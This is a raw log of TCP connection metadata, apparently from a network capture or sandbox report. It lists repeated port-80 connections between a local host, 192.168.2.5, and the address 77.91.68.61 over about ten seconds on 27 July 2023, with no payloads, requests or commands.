Jul 27, 2023 01:33:27.641108990 CEST	49810	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.682857990 CEST	49811	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.686058044 CEST	80	49810	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.686136961 CEST	49810	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.727658033 CEST	80	49811	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.728271008 CEST	49811	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.729799032 CEST	49811	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.774516106 CEST	80	49811	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.778657913 CEST	80	49811	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.778793097 CEST	49811	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.890441895 CEST	49811	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.891555071 CEST	49812	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.935183048 CEST	80	49811	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.935271978 CEST	49811	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.935666084 CEST	80	49812	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.936177969 CEST	49812	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.936177969 CEST	49812	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.980611086 CEST	80	49812	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.984731913 CEST	80	49812	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.986614943 CEST	49812	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.093769073 CEST	49812	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.094510078 CEST	49813	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.138206005 CEST	80	49812	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.138298988 CEST	80	49813	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.138434887 CEST	49813	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.138488054 CEST	49812	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.138911009 CEST	49813	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.182797909 CEST	80	49813	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.186141968 CEST	80	49813	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.186220884 CEST	49813	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.304848909 CEST	49813	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.305524111 CEST	49814	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.348853111 CEST	80	49813	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.349893093 CEST	80	49814	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.350029945 CEST	49813	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.350079060 CEST	49814	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.355055094 CEST	49814	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.399436951 CEST	80	49814	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.403681993 CEST	80	49814	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.403851986 CEST	49814	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.515723944 CEST	49814	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.516628027 CEST	49815	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.560298920 CEST	80	49814	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.561091900 CEST	49814	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.563678980 CEST	80	49815	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.564912081 CEST	49815	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.565356016 CEST	49815	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.610061884 CEST	80	49815	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.614777088 CEST	80	49815	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.614963055 CEST	49815	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.722903013 CEST	49815	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.727845907 CEST	49816	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.767985106 CEST	80	49815	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.768105030 CEST	49815	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.772474051 CEST	80	49816	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.772893906 CEST	49816	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.773269892 CEST	49816	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.817740917 CEST	80	49816	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.822515011 CEST	80	49816	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.826299906 CEST	49816	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.945921898 CEST	49816	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.947797060 CEST	49817	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.990461111 CEST	80	49816	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.990552902 CEST	49816	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.992554903 CEST	80	49817	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:28.992666006 CEST	49817	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:28.997508049 CEST	49817	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.042272091 CEST	80	49817	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.046648026 CEST	80	49817	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.048527002 CEST	49817	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.169605017 CEST	49817	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.170308113 CEST	49818	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.215637922 CEST	80	49818	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.215745926 CEST	49818	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.216198921 CEST	80	49817	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.216259003 CEST	49817	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.216526985 CEST	49818	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.261746883 CEST	80	49818	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.266484976 CEST	80	49818	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.266853094 CEST	49818	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.374836922 CEST	49818	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.390269041 CEST	49819	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.420059919 CEST	80	49818	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.420185089 CEST	49818	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.435719967 CEST	80	49819	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.435822964 CEST	49819	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.436369896 CEST	49819	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.481551886 CEST	80	49819	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.487318039 CEST	80	49819	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.487401962 CEST	49819	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.594161034 CEST	49819	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.595277071 CEST	49820	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.639394999 CEST	80	49819	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.639691114 CEST	49819	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.640433073 CEST	80	49820	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.641258001 CEST	49820	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.644283056 CEST	49820	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.689824104 CEST	80	49820	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.694345951 CEST	80	49820	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.694420099 CEST	49820	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.815556049 CEST	49820	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.816483021 CEST	49821	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.859693050 CEST	80	49820	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.859775066 CEST	49820	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.861063004 CEST	80	49821	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.861150026 CEST	49821	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.861624956 CEST	49821	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:29.906157017 CEST	80	49821	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.910104036 CEST	80	49821	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:29.910204887 CEST	49821	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.015738964 CEST	49821	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.016612053 CEST	49822	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.060580015 CEST	80	49821	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.061310053 CEST	80	49822	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.061389923 CEST	49821	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.061435938 CEST	49822	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.082333088 CEST	49822	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.127355099 CEST	80	49822	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.131021023 CEST	80	49822	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.131114006 CEST	49822	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.236278057 CEST	49822	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.237210035 CEST	49823	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.281064987 CEST	80	49822	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.281151056 CEST	49822	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.281778097 CEST	80	49823	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.281862974 CEST	49823	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.282289028 CEST	49823	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.326905012 CEST	80	49823	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.331037045 CEST	80	49823	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.331608057 CEST	49823	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.437607050 CEST	49823	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.438548088 CEST	49824	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.482659101 CEST	80	49823	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.482722044 CEST	80	49824	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.482784033 CEST	49823	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.482858896 CEST	49824	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.483436108 CEST	49824	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.527755022 CEST	80	49824	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.531375885 CEST	80	49824	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.531495094 CEST	49824	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.640685081 CEST	49824	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.652816057 CEST	49825	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.685302973 CEST	80	49824	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.685398102 CEST	49824	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.697694063 CEST	80	49825	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.697804928 CEST	49825	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.698210955 CEST	49825	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.742753029 CEST	80	49825	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.747298002 CEST	80	49825	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.747447014 CEST	49825	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.859363079 CEST	49825	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.860521078 CEST	49826	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.904201984 CEST	80	49825	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.904393911 CEST	49825	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.905143023 CEST	80	49826	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.905268908 CEST	49826	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.905601025 CEST	49826	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:30.950232983 CEST	80	49826	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.954607010 CEST	80	49826	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:30.954688072 CEST	49826	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.064488888 CEST	49826	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.065395117 CEST	49827	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.109358072 CEST	80	49826	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.109435081 CEST	49826	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.110023022 CEST	80	49827	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.110141993 CEST	49827	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.114099026 CEST	49827	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.158804893 CEST	80	49827	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.163480043 CEST	80	49827	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.163939953 CEST	49827	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.293869972 CEST	49827	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.299000025 CEST	49828	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.338829994 CEST	80	49827	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.339648962 CEST	49827	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.343498945 CEST	80	49828	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.343640089 CEST	49828	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.344119072 CEST	49828	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.388602972 CEST	80	49828	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.392791033 CEST	80	49828	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.392894983 CEST	49828	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.500338078 CEST	49828	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.500977039 CEST	49829	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.545015097 CEST	80	49828	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.545083046 CEST	49828	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.545687914 CEST	80	49829	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.546099901 CEST	49829	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.557617903 CEST	49829	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.602530956 CEST	80	49829	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.606594086 CEST	80	49829	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.606667995 CEST	49829	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.747579098 CEST	49829	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.748378038 CEST	49830	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.792356968 CEST	80	49829	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.792710066 CEST	80	49830	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.792797089 CEST	49829	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.792843103 CEST	49830	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.793322086 CEST	49830	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.837548018 CEST	80	49830	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.841269970 CEST	80	49830	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.841382980 CEST	49830	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.953547955 CEST	49830	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.954282999 CEST	49831	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.998189926 CEST	80	49830	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.998270035 CEST	49830	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:31.998275042 CEST	80	49831	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:31.998359919 CEST	49831	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.001140118 CEST	49831	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.045130968 CEST	80	49831	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.048799038 CEST	80	49831	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.049175978 CEST	49831	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.184556007 CEST	49831	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.188417912 CEST	49832	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.228905916 CEST	80	49831	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.229041100 CEST	49831	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.233357906 CEST	80	49832	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.233520985 CEST	49832	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.234078884 CEST	49832	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.278835058 CEST	80	49832	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.282186985 CEST	80	49832	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.282634974 CEST	49832	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.391396999 CEST	49832	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.392112017 CEST	49833	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.436261892 CEST	80	49832	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.436374903 CEST	49832	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.436388969 CEST	80	49833	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.436479092 CEST	49833	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.496284962 CEST	49833	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.540857077 CEST	80	49833	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.544895887 CEST	80	49833	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.544996023 CEST	49833	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.888048887 CEST	49833	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.888762951 CEST	49834	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.932495117 CEST	80	49833	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.932569027 CEST	49833	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.933082104 CEST	80	49834	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.933254957 CEST	49834	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.945266962 CEST	49834	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:32.989938021 CEST	80	49834	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.995594025 CEST	80	49834	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:32.998639107 CEST	49834	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.189968109 CEST	49834	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.190891981 CEST	49835	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.234575987 CEST	80	49834	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:33.234718084 CEST	49834	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.235088110 CEST	80	49835	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:33.235244989 CEST	49835	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.259270906 CEST	49835	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.304305077 CEST	80	49835	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:33.308007956 CEST	80	49835	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:33.311259031 CEST	49835	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.458643913 CEST	49835	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.459589005 CEST	49836	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.503406048 CEST	80	49835	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:33.503556967 CEST	49835	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.503742933 CEST	80	49836	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:33.503846884 CEST	49836	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.559017897 CEST	49836	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.603307009 CEST	80	49836	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:33.606760979 CEST	80	49836	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:33.606899977 CEST	49836	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.723443985 CEST	49836	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.724103928 CEST	49837	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.767422915 CEST	80	49836	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:33.767586946 CEST	49836	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:33.767980099 CEST	80	49837	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:33.768119097 CEST	49837	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.372004986 CEST	49837	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.416477919 CEST	80	49837	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:34.420125008 CEST	80	49837	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:34.420243025 CEST	49837	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.612673044 CEST	49837	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.613508940 CEST	49838	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.657236099 CEST	80	49837	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:34.657345057 CEST	49837	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.657934904 CEST	80	49838	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:34.658031940 CEST	49838	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.664072990 CEST	49838	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.708853006 CEST	80	49838	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:34.711486101 CEST	80	49838	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:34.711674929 CEST	49838	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.850779057 CEST	49838	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.896200895 CEST	80	49838	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:34.896384001 CEST	49838	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.927171946 CEST	49839	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.972469091 CEST	80	49839	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:34.972661018 CEST	49839	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:34.976977110 CEST	49839	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:35.022377968 CEST	80	49839	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:35.025729895 CEST	80	49839	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:35.025804996 CEST	49839	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.171473026 CEST	49839	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.181210041 CEST	49840	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.215924978 CEST	80	49839	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:36.216029882 CEST	49839	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.225522995 CEST	80	49840	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:36.225686073 CEST	49840	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.431116104 CEST	49840	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.475404978 CEST	80	49840	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:36.479310989 CEST	80	49840	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:36.479401112 CEST	49840	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.728637934 CEST	49840	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.729515076 CEST	49841	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.773109913 CEST	80	49840	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:36.773197889 CEST	49840	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.773688078 CEST	80	49841	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:36.773799896 CEST	49841	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.777601957 CEST	49841	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.821985006 CEST	80	49841	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:36.826761007 CEST	80	49841	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:36.826881886 CEST	49841	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.966200113 CEST	49841	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:36.975078106 CEST	49842	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.010691881 CEST	80	49841	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.010850906 CEST	49841	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.019217968 CEST	80	49842	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.019382000 CEST	49842	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.039940119 CEST	49842	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.084013939 CEST	80	49842	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.088438034 CEST	80	49842	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.088577986 CEST	49842	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.231678963 CEST	49842	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.233897924 CEST	49843	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.275857925 CEST	80	49842	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.275988102 CEST	49842	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.277848959 CEST	80	49843	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.278002024 CEST	49843	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.366626978 CEST	49843	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.410826921 CEST	80	49843	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.416420937 CEST	80	49843	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.416523933 CEST	49843	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.535563946 CEST	49843	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.536206961 CEST	49844	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.579916954 CEST	80	49843	77.91.68.61	192.168.2.5
